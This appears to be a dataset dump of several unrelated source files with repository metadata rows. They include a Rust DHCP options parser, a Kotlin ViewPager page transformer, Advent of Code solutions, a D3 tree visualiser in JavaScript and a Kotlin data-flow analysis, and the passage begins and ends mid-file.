vec!["1-3", "2-1", "3-1"],
vec!["1-3", "2-1", "3-2"],
vec!["1-3", "2-1", "3-3"],
vec!["1-3", "2-2", "3-1"],
vec!["1-3", "2-2", "3-2"],
vec!["1-3", "2-2", "3-3"],
vec!["1-3", "2-3", "3-1"],
vec!["1-3", "2-3", "3-2"],
vec!["1-3", "2-3", "3-3"],
]);
assert_eq!(
expected,
forest
);
}
}
| 24.518421 | 88 | 0.43104 | 3.21875 |
930e02c260b9ab769dfb6fa46dc70d03ed195ef0 | 12,531 | rs | Rust | src/options/parse.rs | Kilobyte22/dhcp_parser | cc95195d6ddd13ff3e9e0816a6dee00f3816d736 | [
"MIT"
] | 2 | 2016-09-05T10:53:09.000Z | 2019-07-19T20:12:13.000Z | src/options/parse.rs | Kilobyte22/dhcp_parser | cc95195d6ddd13ff3e9e0816a6dee00f3816d736 | [
"MIT"
] | 3 | 2016-01-10T20:19:49.000Z | 2019-07-17T06:26:12.000Z | src/options/parse.rs | Kilobyte22/dhcp_parser | cc95195d6ddd13ff3e9e0816a6dee00f3816d736 | [
"MIT"
] | 5 | 2015-10-27T15:11:23.000Z | 2018-10-10T18:35:59.000Z | use options::{DhcpOption};
use options::DhcpOption::*;
use {Result, Error};
use nom::{be_u8, be_u16, be_u32, be_i32, length_value, IResult, sized_buffer};
use std::borrow::{ToOwned};
use std::str;
use std::convert::{From};
use std::net::{IpAddr, Ipv4Addr};
use num::{FromPrimitive};
pub fn parse(bytes: &[u8]) -> Result<Vec<DhcpOption>> {
Ok(vec![])
}
fn u32_to_ip(a: u32) -> IpAddr {
IpAddr::V4(Ipv4Addr::from(a))
}
fn many_ip_addrs(addrs: Vec<u32>) -> Vec<IpAddr> {
addrs.into_iter().map(|a| u32_to_ip(a)).collect()
}
fn ip_addr_pairs(addrs: Vec<u32>) -> Vec<(IpAddr, IpAddr)> {
let (ips, masks): (Vec<_>, Vec<_>) = addrs.into_iter()
.map(|e| u32_to_ip(e))
.enumerate()
.partition(|&(i, _)| i % 2 == 0);
let ips: Vec<_> = ips.into_iter().map(|(_, v)| v).collect();
let masks: Vec<_> = masks.into_iter().map(|(_, v)| v).collect();
ips.into_iter()
.zip(masks.into_iter())
.collect()
}
fn num_u16s(bytes: &[u8]) -> IResult<&[u8], u8> {
match be_u8(bytes) {
IResult::Done(i, o) => IResult::Done(i, o / 2),
a => a,
}
}
fn num_u32s(bytes: &[u8]) -> IResult<&[u8], u8> {
match be_u8(bytes) {
IResult::Done(i, o) => IResult::Done(i, o / 4),
a => a,
}
}
macro_rules! ip_pairs(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
addrs: length_value!(num_u32s, be_u32),
|| { $variant(ip_addr_pairs(addrs)) }
)
);
)
);
/// A macro for the options that take the form
///
/// [tag, length, ip_addr...]
///
/// Since the only thing that really differs, is
/// the tag and the Enum variant that is returned
macro_rules! many_ips(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
addrs: length_value!(num_u32s, be_u32),
|| { $variant(many_ip_addrs(addrs)) }
)
);
)
);
/// A macro for options that are of the form:
///
/// [tag, length, somestring]
///
/// , since I haven't figured out a way to
/// easily construct a parser to take the length
/// out of a byte of the input, and parse that
/// many bytes into a string
macro_rules! length_specific_string(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
s: map_res!(sized_buffer, str::from_utf8),
|| { $variant(s.to_owned()) }
)
);
)
);
macro_rules! single_ip(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
_length: be_u8 ~
addr: be_u32,
|| { $variant(u32_to_ip(addr)) }
)
);
)
);
macro_rules! bool(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
_length: be_u8 ~
val: be_u8,
|| { $variant(val == 1u8) }
)
);
)
);
macro_rules! from_primitive(
($name:ident, $tag:expr, $variant:expr) => (
named!($name<&[u8], DhcpOption>,
chain!(
tag!([$tag]) ~
_l: be_u8 ~
data: map_opt!(be_u8, FromPrimitive::from_u8),
|| { $variant(data) }
)
);
)
);
single_ip!(subnet_mask, 1u8, SubnetMask);
named!(time_offset<&[u8], DhcpOption>,
chain!(
tag!([2u8]) ~
// length field, always 4
be_u8 ~
time: be_i32,
|| { TimeOffset(time) }
)
);
many_ips!(router, 3u8, Router);
many_ips!(time_server, 4u8, TimeServer);
many_ips!(name_server, 5u8, NameServer);
many_ips!(domain_name_server, 6u8, DomainNameServer);
many_ips!(log_server, 7u8, LogServer);
many_ips!(cookie_server, 8u8, CookieServer);
many_ips!(lpr_server, 9u8, LprServer);
many_ips!(impress_server, 10u8, ImpressServer);
many_ips!(resource_loc_server, 11u8, ResourceLocationServer);
length_specific_string!(hostname, 12u8, HostName);
named!(boot_file_size<&[u8], DhcpOption>,
chain!(
tag!([13u8]) ~
_length: be_u8 ~
s: be_u16,
|| { BootFileSize(s) }
)
);
length_specific_string!(merit_dump_file, 14u8, MeritDumpFile);
length_specific_string!(domain_name, 15u8, DomainName);
single_ip!(swap_server, 16u8, SwapServer);
length_specific_string!(root_path, 17u8, RootPath);
length_specific_string!(extensions_path, 18u8, ExtensionsPath);
// COLLECT ALL OF THE ABOVE INTO ONE PARSER
named!(vendor_extensions_rfc1497<&[u8], DhcpOption>, alt!(
chain!(tag!([0u8]),
|| { Pad }
)
| chain!(
tag!([255u8]),
|| { End }
)
| subnet_mask
| time_offset
| router
| time_server
| name_server // 5
| domain_name_server
| log_server
| cookie_server
| lpr_server
| impress_server // 10
| resource_loc_server
| hostname
| boot_file_size
| merit_dump_file
| domain_name // 15
| swap_server
| root_path
| extensions_path
)
);
bool!(ip_forwarding, 19u8, IPForwarding);
bool!(non_source_local_routing, 20u8, NonLocalSourceRouting);
// TODO
/* named!(policy_filter<&[u8], DhcpOption>, */
/* chain!( */
/* tag!([21u8]) ~ */
/* s: map!(sized_buffer, ip_addr_pairs), */
/* || { PolicyFilter(s) } */
/* ) */
/* ); */
named!(max_datagram_reassembly_size<&[u8], DhcpOption>,
chain!(
tag!([22u8]) ~
_len: be_u8 ~
aa: be_u16,
|| { MaxDatagramReassemblySize(aa) }
)
);
named!(default_ip_ttl<&[u8], DhcpOption>,
chain!(
tag!([23u8]) ~
_length: be_u8 ~
ttl: be_u8,
|| { DefaultIpTtl(ttl) }
)
);
named!(path_mtu_aging_timeout<&[u8], DhcpOption>,
chain!(
tag!([24u8]) ~
_length: be_u8 ~
timeout: be_u32,
|| { PathMtuAgingTimeout(timeout) }
)
);
named!(path_mtu_plateau_table<&[u8], DhcpOption>,
chain!(
tag!([25u8]) ~
sizes: length_value!(num_u16s, be_u16),
|| { PathMtuPlateauTable(sizes) }
)
);
// COLLECT
named!(ip_layer_parameters_per_host<&[u8], DhcpOption>, alt!(
ip_forwarding
| non_source_local_routing // 20
/* | policy_filter //TODO */
| max_datagram_reassembly_size
| default_ip_ttl
| path_mtu_aging_timeout
| path_mtu_plateau_table // 25
)
);
named!(interface_mtu<&[u8], DhcpOption>,
chain!(
tag!([26u8]) ~
_length: be_u8 ~
mtu: be_u16,
|| { InterfaceMtu(mtu) }
)
);
bool!(all_subnets_are_local, 27u8, AllSubnetsAreLocal);
single_ip!(broadcast_address, 28u8, BroadcastAddress);
bool!(perform_mask_discovery, 29u8, PerformMaskDiscovery);
bool!(mask_supplier, 30u8, MaskSupplier);
bool!(perform_router_discovery, 31u8, PerformRouterDiscovery);
single_ip!(router_solicitation_address, 32u8, RouterSolicitationAddress);
ip_pairs!(static_route, 33u8, StaticRoute);
// COLLECT
named!(ip_layer_parameters_per_interface<&[u8], DhcpOption>, alt!(
interface_mtu
| all_subnets_are_local
| broadcast_address
| perform_mask_discovery
| mask_supplier // 30
| perform_router_discovery
| router_solicitation_address
| static_route
)
);
bool!(trailer_encapsulation, 34u8, TrailerEncapsulation);
named!(arp_cache_timeout<&[u8], DhcpOption>,
chain!(
tag!([35u8]) ~
_length: be_u8 ~
timeout: be_u32,
|| { ArpCacheTimeout(timeout) }
)
);
bool!(ethernet_encapsulation, 36u8, EthernetEncapsulation);
// COLLECT
named!(link_layer_parameters_per_interface<&[u8], DhcpOption>, alt!(
trailer_encapsulation
| arp_cache_timeout // 35
| ethernet_encapsulation
)
);
named!(tcp_default_ttl<&[u8], DhcpOption>,
chain!(
tag!([37u8]) ~
_length: be_u8 ~
ttl: be_u8,
|| { TcpDefaultTtl(ttl) }
)
);
named!(tcp_keepalive_interval<&[u8], DhcpOption>,
chain!(
tag!([38u8]) ~
_length: be_u8 ~
interval: be_u32,
|| { TcpKeepaliveInterval(interval) }
)
);
bool!(tcp_keepalive_garbage, 39u8, TcpKeepaliveGarbage);
// COLLECT
named!(tcp_parameters<&[u8], DhcpOption>, alt!(
tcp_default_ttl
| tcp_keepalive_interval
| tcp_keepalive_garbage
)
);
length_specific_string!(nis_domain, 40u8, NisDomain);
many_ips!(network_information_servers, 41u8, NetworkInformationServers);
many_ips!(ntp_servers, 42u8, NtpServers);
named!(vendor_extensions<&[u8], DhcpOption>,
chain!(
tag!([43u8]) ~
bytes: length_value!(be_u8, be_u8),
|| { VendorExtensions(bytes) }
)
);
many_ips!(net_bios_name_servers, 44u8, NetBiosNameServers);
many_ips!(net_bios_datagram_distribution_server, 45u8, NetBiosDatagramDistributionServer);
named!(net_bios_node_type<&[u8], DhcpOption>,
chain!(
tag!([46u8]) ~
_length: be_u8 ~
data: map_opt!(be_u8, FromPrimitive::from_u8),
|| { NetBiosNodeType(data) }
)
);
length_specific_string!(net_bios_scope, 47u8, NetBiosScope);
many_ips!(xfont_server, 48u8, XFontServer);
many_ips!(xdisplay_manager, 49u8, XDisplayManager);
// COLLECT
named!(application_and_service_parameters<&[u8], DhcpOption>, alt!(
nis_domain // 40
| network_information_servers
| ntp_servers
| vendor_extensions
| net_bios_name_servers
| net_bios_datagram_distribution_server // 45
| net_bios_node_type
| net_bios_scope
| xfont_server
| xdisplay_manager
)
);
single_ip!(requested_ip_address, 50u8, RequestedIpAddress);
named!(ip_address_lease_time<&[u8], DhcpOption>,
chain!(
tag!([51u8]) ~
_length: be_u8 ~
time: be_u32,
|| { IpAddressLeaseTime(time) }
)
);
from_primitive!(option_overload, 52u8, OptionOverload);
from_primitive!(message_type, 53u8, MessageType);
single_ip!(server_identifier, 54u8, ServerIdentifier);
named!(param_request_list<&[u8], DhcpOption>,
chain!(
tag!([55u8]) ~
data: length_value!(be_u8, be_u8),
|| { ParamRequestList(data) }
)
);
length_specific_string!(message, 56u8, Message);
named!(max_message_size<&[u8], DhcpOption>,
chain!(
tag!([57u8]) ~
_l: be_u8 ~
size_: be_u16,
|| { MaxMessageSize(size_) }
)
);
// COLLECT
named!(dhcp_extensions<&[u8], DhcpOption>, alt!(
requested_ip_address // 50
| ip_address_lease_time
| option_overload
| message_type
| server_identifier
| param_request_list // 55
| message
/* | max_message_size */
/* | renewal_time_value */
/* | rebinding_time_value */
/* | class_identifier // 60 */
/* | client_identifier */
)
);
// Main parser
named!(dhcp_option(&'a [u8]) -> DhcpOption, alt!(
vendor_extensions_rfc1497
| ip_layer_parameters_per_host
| ip_layer_parameters_per_interface
| link_layer_parameters_per_interface
| tcp_parameters
| application_and_service_parameters
| dhcp_extensions
)
);
#[cfg(test)] mod tests {
use options::DhcpOption::{Router};
use super::{router};
use nom::{IResult};
use std::net::{IpAddr, Ipv4Addr};
#[test]
fn test_many_ip_addresses() {
let ips = vec![3u8,
8,
127, 0, 0, 1,
192, 168, 1, 1,
];
match router(&ips) {
IResult::Done(i, o) => {
if i.len() > 0 {
panic!("Remaining input was {:?}", i);
}
assert_eq!(o, Router(vec![IpAddr::V4(Ipv4Addr::new(127, 0, 0, 1)),
IpAddr::V4(Ipv4Addr::new(192, 168, 1, 1))]));
},
e => panic!("Result was {:?}", e),
}
}
}
| 27.360262 | 90 | 0.562365 | 3.03125 |
8ab928e461865fa511c336723c790fdcfd96989a | 1,361 | kt | Kotlin | app/src/main/java/ru/kartsev/dmitry/cinemadetails/mvvm/view/helper/ZoomOutPageTransformer.kt | Jaguarhl/MoviesDetails | d80929fcb461249c074dfff73ce7156ee91ff074 | [
"Apache-2.0"
] | null | null | null | app/src/main/java/ru/kartsev/dmitry/cinemadetails/mvvm/view/helper/ZoomOutPageTransformer.kt | Jaguarhl/MoviesDetails | d80929fcb461249c074dfff73ce7156ee91ff074 | [
"Apache-2.0"
] | null | null | null | app/src/main/java/ru/kartsev/dmitry/cinemadetails/mvvm/view/helper/ZoomOutPageTransformer.kt | Jaguarhl/MoviesDetails | d80929fcb461249c074dfff73ce7156ee91ff074 | [
"Apache-2.0"
] | null | null | null | package ru.kartsev.dmitry.cinemadetails.mvvm.view.helper
import android.view.View
import androidx.viewpager.widget.ViewPager
import kotlin.math.abs
import kotlin.math.max
private const val MIN_SCALE = 0.85f
private const val MIN_ALPHA = 0.5f
class ZoomOutPageTransformer : ViewPager.PageTransformer {
override fun transformPage(view: View, position: Float) {
view.apply {
val pageWidth = width
val pageHeight = height
when {
position < -1 -> {
alpha = 0f
}
position <= 1 -> {
val scaleFactor = max(MIN_SCALE, 1 - abs(position))
val vertMargin = pageHeight * (1 - scaleFactor) / 2
val horzMargin = pageWidth * (1 - scaleFactor) / 2
translationX = if (position < 0) {
horzMargin - vertMargin / 2
} else {
horzMargin + vertMargin / 2
}
scaleX = scaleFactor
scaleY = scaleFactor
alpha = (MIN_ALPHA +
(((scaleFactor - MIN_SCALE) / (1 - MIN_SCALE)) * (1 - MIN_ALPHA)))
}
else -> {
alpha = 0f
}
}
}
}
} | 31.651163 | 90 | 0.47612 | 3 |
f54a78074f5651a294b5fca64ab5fd88bc3b4ad6 | 842 | rs | Rust | rust/src/day01/part01.rs | goksgie/advent-of-code-2021 | e0df17bac95daf221ab97dbcf3f6bfc36aacf04a | [
"MIT"
] | null | null | null | rust/src/day01/part01.rs | goksgie/advent-of-code-2021 | e0df17bac95daf221ab97dbcf3f6bfc36aacf04a | [
"MIT"
] | null | null | null | rust/src/day01/part01.rs | goksgie/advent-of-code-2021 | e0df17bac95daf221ab97dbcf3f6bfc36aacf04a | [
"MIT"
] | null | null | null | /// Compute the consequtive increase in the input and output the result
/// as u64.
pub fn compute_consequtive_increase<'a, T: IntoIterator<Item = &'a u64>>(numbers: T) -> u64 {
let mut prev_elem = None;
let mut result = 0;
for elem in numbers {
if let Some(prev) = prev_elem {
if elem > prev {
result += 1;
}
}
prev_elem = Some(elem);
}
result
}
#[test]
fn test_compute_increase() {
let test_data: Vec<(Vec<u64>, u64)> = vec![
(vec![199, 200, 208, 210, 200, 207, 240, 269, 260, 263], 7),
(vec![1, 1, 1, 2, 1, 1, 1], 1)
];
// the following iteration will consume the test data vector.
for (test_inp, result) in test_data.iter() {
assert_eq!(compute_consequtive_increase(test_inp), *result);
}
} | 27.16129 | 93 | 0.557007 | 3.265625 |
83a7a128dbfc52d480556e124e5c3c03ec04e023 | 4,348 | rs | Rust | src/main.rs | laptou/reactions-telegram-bot | 7b044b1e8d9b313836dd99dcf4797f2346b76323 | [
"MIT"
] | 5 | 2021-03-21T17:04:52.000Z | 2021-12-30T21:18:45.000Z | src/main.rs | laptou/reactions-telegram-bot | 7b044b1e8d9b313836dd99dcf4797f2346b76323 | [
"MIT"
] | 2 | 2020-10-01T22:11:58.000Z | 2020-10-04T17:01:16.000Z | src/main.rs | laptou/reactions-telegram-bot | 7b044b1e8d9b313836dd99dcf4797f2346b76323 | [
"MIT"
] | 1 | 2021-04-15T13:57:01.000Z | 2021-04-15T13:57:01.000Z | use std::{convert::Infallible, env, net::SocketAddr};
use log::{info, warn};
use pretty_env_logger;
use teloxide::{dispatching::update_listeners::UpdateListener, utils::command::BotCommand};
use teloxide::{prelude::*, types::*};
use tokio;
mod handler;
mod reaction;
use handler::{handle_callback_query, handle_command};
use warp::{hyper::StatusCode, Filter};
#[derive(BotCommand, PartialEq, Eq, Debug, Clone, Copy)]
#[command(rename = "lowercase", description = "These commands are supported:")]
pub enum Command {
#[command(description = "display this text.")]
Help,
#[command(description = "react to a message", rename = "r")]
React,
#[command(description = "react to a message with a ❤")]
Heart,
#[command(description = "react to a message with a 👍")]
Up,
#[command(description = "react to a message with a 👎")]
Down,
#[command(description = "show who reacted to a message", rename = "s")]
Show,
}
#[tokio::main]
async fn main() {
info!("starting reactions bot");
teloxide::enable_logging!();
info!("token: {:?}", env::var("TELOXIDE_TOKEN").unwrap());
let bot = Bot::from_env();
let listener = webhook(bot.clone()).await;
Dispatcher::new(bot)
.messages_handler(move |rx: DispatcherHandlerRx<Message>| {
rx.for_each_concurrent(None, move |update| async move {
if let Some(text) = update.update.text() {
if let Ok(cmd) = Command::parse(text, "reaxnbot") {
if let Err(err) = handle_command(update, cmd).await {
warn!("message response failed: {:?}", err);
}
}
}
})
})
.callback_queries_handler(move |rx: DispatcherHandlerRx<CallbackQuery>| {
rx.for_each_concurrent(None, move |update| async move {
if let Err(err) = handle_callback_query(update).await {
warn!("callback query response failed: {:?}", err);
}
})
})
.dispatch_with_listener(listener, LoggingErrorHandler::new())
.await;
}
pub async fn webhook<'a>(bot: Bot) -> impl UpdateListener<Infallible> {
// Heroku defines auto defines a port value
let teloxide_token = env::var("TELOXIDE_TOKEN").expect("TELOXIDE_TOKEN env variable missing");
let port: u16 = env::var("PORT")
.expect("PORT env variable missing")
.parse()
.expect("PORT value to be integer");
let endpoint = format!("bot{}", teloxide_token);
let prefix = "reactions";
let url = format!("https://reaxnbot.dev/{}/{}", prefix, endpoint);
bot.set_webhook(url)
.send()
.await
.expect("Cannot setup a webhook");
let (tx, rx) = tokio::sync::mpsc::unbounded_channel();
let server = warp::post()
.and(warp::path(prefix))
.and(warp::path(endpoint))
.and(warp::body::json())
.map(move |json: serde_json::Value| {
let try_parse = match serde_json::from_str(&json.to_string()) {
Ok(update) => Ok(update),
Err(error) => {
log::error!(
"Cannot parse an update.\nError: {:?}\nValue: {}\n\
This is a bug in teloxide, please open an issue here: \
https://github.com/teloxide/teloxide/issues.",
error,
json
);
Err(error)
}
};
if let Ok(update) = try_parse {
tx.send(Ok(update))
.expect("Cannot send an incoming update from the webhook")
}
StatusCode::OK
});
let test_route = warp::get()
.and(warp::path::tail())
.map(|tail| format!("hello world {:?}", tail));
let server = server.or(test_route).recover(handle_rejection);
let serve = warp::serve(server);
let address = format!("0.0.0.0:{}", port);
tokio::spawn(serve.run(address.parse::<SocketAddr>().unwrap()));
rx
}
async fn handle_rejection(error: warp::Rejection) -> Result<impl warp::Reply, Infallible> {
log::error!("Cannot process the request due to: {:?}", error);
Ok(StatusCode::INTERNAL_SERVER_ERROR)
}
| 33.705426 | 98 | 0.560948 | 3.09375 |
85b09f781bff657bfa1b539e3984457a9d1a791a | 7,043 | js | JavaScript | js/tree_vis.js | UnofficialJuliaMirrorSnapshots/D3Trees.jl-e3df1716-f71e-5df9-9e2d-98e193103c45 | c97f3175a258528c66d7b16f36627c903c9e3a03 | [
"MIT"
] | 22 | 2017-09-29T18:22:25.000Z | 2021-09-29T19:54:20.000Z | js/tree_vis.js | UnofficialJuliaMirrorSnapshots/D3Trees.jl-e3df1716-f71e-5df9-9e2d-98e193103c45 | c97f3175a258528c66d7b16f36627c903c9e3a03 | [
"MIT"
] | 20 | 2017-09-27T02:13:55.000Z | 2020-07-15T16:01:18.000Z | js/tree_vis.js | UnofficialJuliaMirrorSnapshots/D3Trees.jl-e3df1716-f71e-5df9-9e2d-98e193103c45 | c97f3175a258528c66d7b16f36627c903c9e3a03 | [
"MIT"
] | 6 | 2018-02-26T18:33:41.000Z | 2021-08-03T12:23:42.000Z | if (typeof $ === 'undefined') {
loadScript("https://code.jquery.com/jquery-3.1.1.min.js", run);
} else {
run();
}
function run() {
if (typeof d3 === 'undefined') {
loadScript("https://d3js.org/d3.v3.js", showTree);
} else {
showTree();
}
}
function loadScript(url, callback)
{
console.log("starting script load...")
// Adding the script tag to the head as suggested before
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = url;
// Then bind the event to the callback function.
// There are several events for cross browser compatibility.
script.onreadystatechange = callback;
script.onload = callback;
// Fire the loading
head.appendChild(script);
}
function showTree() {
// var margin = {top: 20, right: 120, bottom: 20, left: 120},
var margin = {top: 20, right: 120, bottom: 80, left: 120},
width = $("#"+div).width() - margin.right - margin.left,
height = svgHeight - margin.top - margin.bottom;
// TODO make height a parameter of TreeVisualizer
var i = 0,
root;
var tree = d3.layout.tree()
.size([width, height]);
var diagonal = d3.svg.diagonal();
//.projection(function(d) { return [d.y, d.x]; });
// uncomment above to make the tree go horizontally
// see http://stackoverflow.com/questions/16265123/resize-svg-when-window-is-resized-in-d3-js
if (d3.select("#"+div+"_svg").empty()) {
$(".d3twarn").remove();
d3.select("#"+div).append("svg")
.attr("id", div+"_svg")
.attr("width", width + margin.right + margin.left)
.attr("height", height + margin.top + margin.bottom);
}
d3.select("#"+div+"_svg").selectAll("*").remove();
var svg = d3.select("#"+div+"_svg")
.append("g")
.attr("transform", "translate(" + margin.left + "," + margin.top + ")");
// console.log("tree data:");
// console.log(treeData[rootID]);
root = createDisplayNode(rootID, initExpand);
root.x0 = width / 2;
root.y0 = 0;
update(root, initDuration);
console.log("tree should appear");
function createDisplayNode(id, expandLevel) {
var dnode = {"dataID":id,
"children": null,
"_children":null};
if (expandLevel > 0) {
initializeChildren(dnode, expandLevel);
}
return dnode;
}
function initializeChildren(d, expandLevel) {
// create children
var children = treeData.children[d.dataID];
d.children = [];
if (children) {
for (var i = 0; i < children.length; i++) {
var cid = children[i]-1;
d.children.push(createDisplayNode(cid, expandLevel-1));
}
}
}
/**
* Recursively called to update each node in the tree.
*
* source is a d3 node that has position, etc.
*/
function update(source, duration) {
width = $("#"+div).width() - margin.right - margin.left,
height = $("#"+div).height() - margin.top - margin.bottom;
tree.size([width,height]);
d3.select("#"+div).attr("width", width + margin.right + margin.left)
.attr("height", height + margin.top + margin.bottom);
d3.select("#"+div+"_svg").attr("width", width + margin.right + margin.left)
.attr("height", height + margin.top + margin.bottom);
// Compute the new tree layout.
var nodes = tree.nodes(root).reverse(),
links = tree.links(nodes);
// Update the nodes…
var node = svg.selectAll("g.node")
.data(nodes, function(d) { return d.id || (d.id = ++i); });
// Enter any new nodes at the parent's previous position.
var nodeEnter = node.enter().append("g")
.attr("class", "node")
.attr("transform", function(d) { return "translate(" + source.x0 + "," + source.y0 + ")"; })
.on("click", click)
nodeEnter.append("circle")
.attr("r", "10px")
.attr("style", function(d) { return treeData.style[d.dataID]; } )
var tbox = nodeEnter.append("text")
.attr("y", 25)
.attr("text-anchor", "middle")
//.text( function(d) { return treeData.text[d.dataID]; } )
.style("fill-opacity", 1e-6);
tbox.each( function(d) {
var el = d3.select(this)
var text = treeData.text[d.dataID];
var lines = text.split('\n');
for (var i = 0; i < lines.length; i++) {
var tspan = el.append("tspan").text(lines[i]);
if (i > 0) {
tspan.attr("x", 0).attr("dy", "1.2em");
}
}
});
//tooltip
nodeEnter.append("title").text( function(d) { return treeData.tooltip[d.dataID];} );
// Transition nodes to their new position.
var nodeUpdate = node.transition()
.duration(duration)
.attr("transform", function(d) { return "translate(" + d.x + "," + d.y + ")"; });
nodeUpdate.select("text")
.style("fill-opacity", 1);
// Transition exiting nodes to the parent's new position.
var nodeExit = node.exit().transition()
.duration(duration)
.attr("transform", function(d) { return "translate(" + source.x + "," + source.y + ")"; })
.remove();
nodeExit.select("text")
.style("fill-opacity", 1e-6);
// Update the links…
var link = svg.selectAll("path.link")
.data(links, function(d) { return d.target.id; });
// Enter any new links at the parent's previous position.
// XXX link width should be based on transition data, not node data
link.enter().insert("path", "g")
.attr("class", "link")
.attr("style", function(d) {
var ls = treeData.link_style[d.target.dataID];
return ls;
} )
.attr("d", function(d) {
var o = {x: source.x0, y: source.y0};
return diagonal({source: o, target: o});
});
// Transition links to their new position.
link.transition()
.duration(duration)
.attr("d", diagonal);
// Transition exiting nodes to the parent's new position.
link.exit().transition()
.duration(duration)
.attr("d", function(d) {
var o = {x: source.x, y: source.y};
return diagonal({source: o, target: o});
})
.remove();
// Stash the old positions for transition.
nodes.forEach(function(d) {
d.x0 = d.x;
d.y0 = d.y;
});
}
// Toggle children on click.
function click(d) {
if (d.children) {
d._children = d.children;
d.children = null;
} else if (d._children) {
d.children = d._children;
d._children = null;
} else {
initializeChildren(d, 1);
}
update(d, 750);
}
}
| 31.441964 | 102 | 0.543802 | 3.046875 |
5adc45dcf20cc0bceef7b69f755461f0ee107f2f | 2,215 | rs | Rust | 2017/src/day01.rs | shrugalic/advent_of_code | 8d18a3dbdcf847a667ab553f5441676003b9362a | [
"MIT"
] | 1 | 2021-12-17T18:26:17.000Z | 2021-12-17T18:26:17.000Z | 2017/src/day01.rs | shrugalic/advent_of_code | 8d18a3dbdcf847a667ab553f5441676003b9362a | [
"MIT"
] | null | null | null | 2017/src/day01.rs | shrugalic/advent_of_code | 8d18a3dbdcf847a667ab553f5441676003b9362a | [
"MIT"
] | null | null | null | use line_reader::read_file_to_lines;
pub(crate) fn day1_part1() -> u32 {
let line = read_file_to_lines("input/day01.txt").remove(0);
solve_part1_captcha(line)
}
pub(crate) fn day1_part2() -> u32 {
let line = read_file_to_lines("input/day01.txt").remove(0);
solve_part2_captcha(line)
}
fn solve_part1_captcha<T: AsRef<str>>(line: T) -> u32 {
solve_captcha(parse_input(line), 1)
}
fn solve_part2_captcha<T: AsRef<str>>(line: T) -> u32 {
let numbers = parse_input(line);
let offset = numbers.len() / 2;
solve_captcha(numbers, offset)
}
fn solve_captcha(mut numbers: Vec<u32>, offset: usize) -> u32 {
numbers.extend_from_within(0..offset);
numbers
.iter()
.zip(numbers.iter().skip(offset))
.filter_map(|(a, b)| {
// println!("{} <> {}", a, b);
if a == b {
Some(a)
} else {
None
}
})
.sum::<u32>()
}
fn parse_input<T: AsRef<str>>(line: T) -> Vec<u32> {
line.as_ref()
.chars()
.filter_map(|c| c.to_digit(10))
.collect()
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn part1_example1() {
assert_eq!(3, solve_part1_captcha("1122"));
}
#[test]
fn part1_example2() {
assert_eq!(4, solve_part1_captcha("1111"));
}
#[test]
fn part1_example3() {
assert_eq!(0, solve_part1_captcha("1234"));
}
#[test]
fn part1_example4() {
assert_eq!(9, solve_part1_captcha("91212129"));
}
#[test]
fn test_day1_part1() {
assert_eq!(1144, day1_part1());
}
#[test]
fn part2_example1() {
assert_eq!(6, solve_part2_captcha("1212"));
}
#[test]
fn part2_example2() {
assert_eq!(0, solve_part2_captcha("1221"));
}
#[test]
fn part2_example3() {
assert_eq!(4, solve_part2_captcha("123425"));
}
#[test]
fn part2_example4() {
assert_eq!(12, solve_part2_captcha("123123"));
}
#[test]
fn part2_example5() {
assert_eq!(4, solve_part2_captcha("12131415"));
}
#[test]
fn test_day1_part2() {
assert_eq!(1194, day1_part2());
}
}
| 20.896226 | 63 | 0.552596 | 3.21875 |
fb628cfd5872f8ee00cb34decf048e7ec09267be | 3,752 | kt | Kotlin | psolib/src/commonMain/kotlin/world/phantasmal/psolib/asm/dataFlowAnalysis/GetStackValue.kt | DaanVandenBosch/phantasmal-world | 89ea739c65fda32cda1caaf159cad022469e2663 | [
"MIT"
] | 16 | 2019-06-14T03:20:51.000Z | 2022-02-04T08:01:56.000Z | psolib/src/commonMain/kotlin/world/phantasmal/psolib/asm/dataFlowAnalysis/GetStackValue.kt | DaanVandenBosch/phantasmal-world | 89ea739c65fda32cda1caaf159cad022469e2663 | [
"MIT"
] | 12 | 2019-09-15T20:37:05.000Z | 2022-02-06T03:24:22.000Z | psolib/src/commonMain/kotlin/world/phantasmal/psolib/asm/dataFlowAnalysis/GetStackValue.kt | DaanVandenBosch/phantasmal-world | 89ea739c65fda32cda1caaf159cad022469e2663 | [
"MIT"
] | 5 | 2019-07-20T05:16:20.000Z | 2021-11-15T09:19:54.000Z | package world.phantasmal.psolib.asm.dataFlowAnalysis
import mu.KotlinLogging
import world.phantasmal.psolib.asm.*
private val logger = KotlinLogging.logger {}
/**
* Computes the possible values of a stack element at the nth position from the top, right before a
* specific instruction. If the stack element's value can be traced back to a single push
* instruction, that instruction is also returned.
*/
fun getStackValue(
cfg: ControlFlowGraph,
instruction: Instruction,
position: Int,
): Pair<ValueSet, Instruction?> {
val block = cfg.getBlockForInstruction(instruction)
return StackValueFinder().find(
mutableSetOf(),
cfg,
block,
block.indexOfInstruction(instruction),
position,
)
}
private class StackValueFinder {
private var iterations = 0
fun find(
path: MutableSet<BasicBlock>,
cfg: ControlFlowGraph,
block: BasicBlock,
end: Int,
position: Int,
): Pair<ValueSet, Instruction?> {
if (++iterations > 100) {
logger.warn { "Too many iterations." }
return Pair(ValueSet.all(), null)
}
var pos = position
for (i in end - 1 downTo block.start) {
val instruction = block.segment.instructions[i]
if (instruction.opcode.stack == StackInteraction.Pop) {
pos += instruction.opcode.params.size
continue
}
val args = instruction.args
when (instruction.opcode.code) {
OP_ARG_PUSHR.code -> {
if (pos == 0) {
val arg = args[0]
return if (arg is IntArg) {
Pair(getRegisterValue(cfg, instruction, arg.value), instruction)
} else {
Pair(ValueSet.all(), instruction)
}
} else {
pos--
}
}
OP_ARG_PUSHL.code,
OP_ARG_PUSHB.code,
OP_ARG_PUSHW.code,
-> {
if (pos == 0) {
val arg = args[0]
return if (arg is IntArg) {
Pair(ValueSet.of(arg.value), instruction)
} else {
Pair(ValueSet.all(), instruction)
}
} else {
pos--
}
}
OP_ARG_PUSHA.code,
